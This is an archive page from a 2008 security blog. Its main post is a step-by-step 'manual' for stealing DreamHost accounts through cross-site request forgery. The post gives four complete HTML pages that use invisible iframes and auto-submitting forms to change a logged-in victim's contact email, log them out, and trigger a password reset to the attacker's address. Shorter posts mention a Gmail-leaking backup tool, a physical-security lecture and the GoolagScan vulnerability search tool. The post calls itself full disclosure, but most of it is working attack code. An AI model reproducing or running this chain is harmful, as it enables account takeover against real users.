Security Related

Guy Mizrahi about Security and Technology.
Subscribe

Archive for the ‘Hacking’

How to Steal DreamHost accounts?

June 14, 2008 By: Guy Mizrahi Category: Hacking, Security 6 Comments →

I thought a lot before posting this, but in the name of full disclosures..

This is the second time someone is trying to do that against my dreamhost account so I guess that it need to be public.

It will work on any dreamhost costumer that logged in to his account (Note – you must use the logout button and then it will not work on your account 🙂 ).

A legal notice – If you use this to hack into someone’s account you probably know that it is illegal and I have nothing to do with it. This disclosure is for learning purpose and to make dreamhost fix it asap..

A short manual – how to steal dreamhost accounts (I guess that it can be used to steal any account that use same defective security mechanism).

So – How?

It is done by sending a link to a page you need to create and host online.

There will be 4 web pages to do 3 stages of attack:

1. Automatic change of contact details in the dreamhost control panel from your mark’s details to something you can get access to (the most important is the e-mail address).

2. automatic logoff your mark from dreamhost’s control panel.

3. request a new password to the new e-mail from dreamhost.

The first page (lets call it start.php):

   1:  <html>
   2:  <META content="text/html; charset=iso-8859-8-i" http-equiv=Content-Type>
   3:  <a1>This page can not be found</a1>
   4:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info.php" scrolling="no" frameborder="0"></iframe>
   5:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0">
   6:  </iframe>
   7:  </html>

as you can see, this page is loading two iframes with 0.1% height and width so the mark can’t see it.

info.php:

   1:  <html>
   2:  <body>
   3:  <form method=post action="https://panel.dreamhost.com/id/?" id="2" name="asd">
   4:  <input type=hidden name=tab value="contact">
   5:  <input type=hidden name="command" value="submit_edit">
   6:      <tr valign=top>
   7:          <td id=txt align=right><b>Name:</b></td>
   8:          <td><select name="prefix" id=frm>
   9:                  <option value=""></option>
  10:                  </select>
  11:                  <input name="first" value="somename" size="8" id=frm>
  12:                  <input name="middle" size="1" id=frm>
  13:                  <input name="last" value="somefamily" size="8" id=frm>
  14:                  <select name="suffix" id=frm>
  15:                  <option value=""></option>
  16:                  </select>
  17:          </td>
  18:      </tr>
  19:      <tr valign=top>
  20:  
  21:          <td id=txt align=right><b>Address:</b></td>
  22:          <td><input name="street1" value="somestreet" size=30 id=frm><br>
  23:                  <input name="street2" size=30 id=frm><br>
  24:                  <input name="city" value="somecity"  size=20 id=frm>, <input name="state" size=2 id=frm> <input name="zip" value="1324" size=8 id=frm><br><select name="country" id=frm><option value="US">United States</option>
  25:  </select>
  26:          </td>
  27:      </tr>
  28:      <tr valign=top>
  29:          <td id=txt align=right><b>Email:</b></td>
  30:          <td><input name="email" value="somemail@somedomain.com" size=30 id=frm></td>
  31:      </tr>
  32:      <tr>
  33:          <td id=txt align=right><b>Phone:</b></td>
  34:          <td><input name="phone" value="+123.45.6789123" size=30 id=frm></td>
  35:      </tr>
  36:      <tr>
  37:          <td id=txt align=right><b>Fax:</b>*</td>
  38:          <td><input name="fax" size=30 id=frm></td>
  39:      </tr>
  40:      <tr>
  41:          <td id=txt align=right><b>IM:</b>*</td>
  42:          <td><input name="chat" size=30 id=frm></td>
  43:      </tr>
  44:      <tr>
  45:          <td id=txt align=right><b>URL:</b>*</td>
  46:          <td><input name="url" size=30 id=frm></td>
  47:      </tr>
  48:      <tr>
  49:          <td></td>
  50:          <td id=txt>*optional information</td>
  51:      </tr>
  52:      <tr>
  53:          <td colspan=2 align=center id=txt><input type=submit value="Submit New Contact Info" id=frm><br>or<br></td>
  54:      </tr>
  55:  </form>
  56:  <script>
  57:  document.asd.submit();
  58:  </script>
  59:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0">
  60:  </body>
  61:  <html>

as you can see – this page will change the mark’s dreamhost control panel details to whatever you want and then redirect to info3.php

info3.php:

   1:  <html>
   2:  <iframe height="0.1%" width="0.1%" src="https://panel.dreamhost.com/index.cgi?Nscmd=Nlogout" scrolling="no" frameborder="0">
   3:  </iframe>
   4:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info2.html" scrolling="no" frameborder="0"></iframe>
   5:  </html>

as you can see – info3.php is doing two things:

1. logoff your mark from dreamhost control panel

2. redirect to info2.html

info2.html:

   1:  <html>
   2:  <body onload="document.getElementById('2').submit()">
   3:  <form method="post" class="fancyform" action="https://panel.dreamhost.com/login/forgot.cgi" id="2">
   4:  <input type="hidden" name="return_url" value="" />
   5:  <input type="hidden" name="email_pwd_submitted" value="1" />
   6:  <input name="email" class="text" value="somemail@somedomain.com">
   7:  <input type="submit" class="button" value="Email me my password!">
   8:  </form>
   9:  </body>
  10:  </html>

this last step is to send a forget password notice to the new email address.

that’s it – 4 pages and you can get any dreamhost account..

G-Archiver is exposing your Gmail account details.

March 12, 2008 By: Guy Mizrahi Category: Hacking, Security No Comments →

“G-Archiver is your one click Gmail backup solution. Backup Gmail email messages”

The developer forgot to mention that G-Archiver also give him the ability to hack into your Gmail account.

read about it here:

http://www.codinghorror.com/blog/archives/001072.html

Physical Security

March 08, 2008 By: Guy Mizrahi Category: Hacking, Security 1 Comment →

Johnny from IhackStuff give a great 1 hour lecture about physical security, No Tech Hacking and Ninja way of hacking 🙂

He talks great, give a lot of stuff to think about.

You have to see this.

1 hour but worth every second.

GoolagScan

March 06, 2008 By: Guy Mizrahi Category: Hacking No Comments →

Cult of the Dead Cow – the same guys that created Back Orifice (isn’t it amazing that the site is still online?) released a tool that turning google into a vulnerability search machine.

This new tool: Goolag Scan allow everyone to detect web site vulnerabilities easily.

There is no new stuff here. google hacking is known for years and Johnny‘s site is full of this kind of search phrases.

cDc just gave everyone (even guy’s with no knowledge) the option to test a site for vulnerabilities.

http://www.goolag.org


Bad Behavior has blocked 143 access attempts in the last 7 days.

FireStats icon Powered by FireStats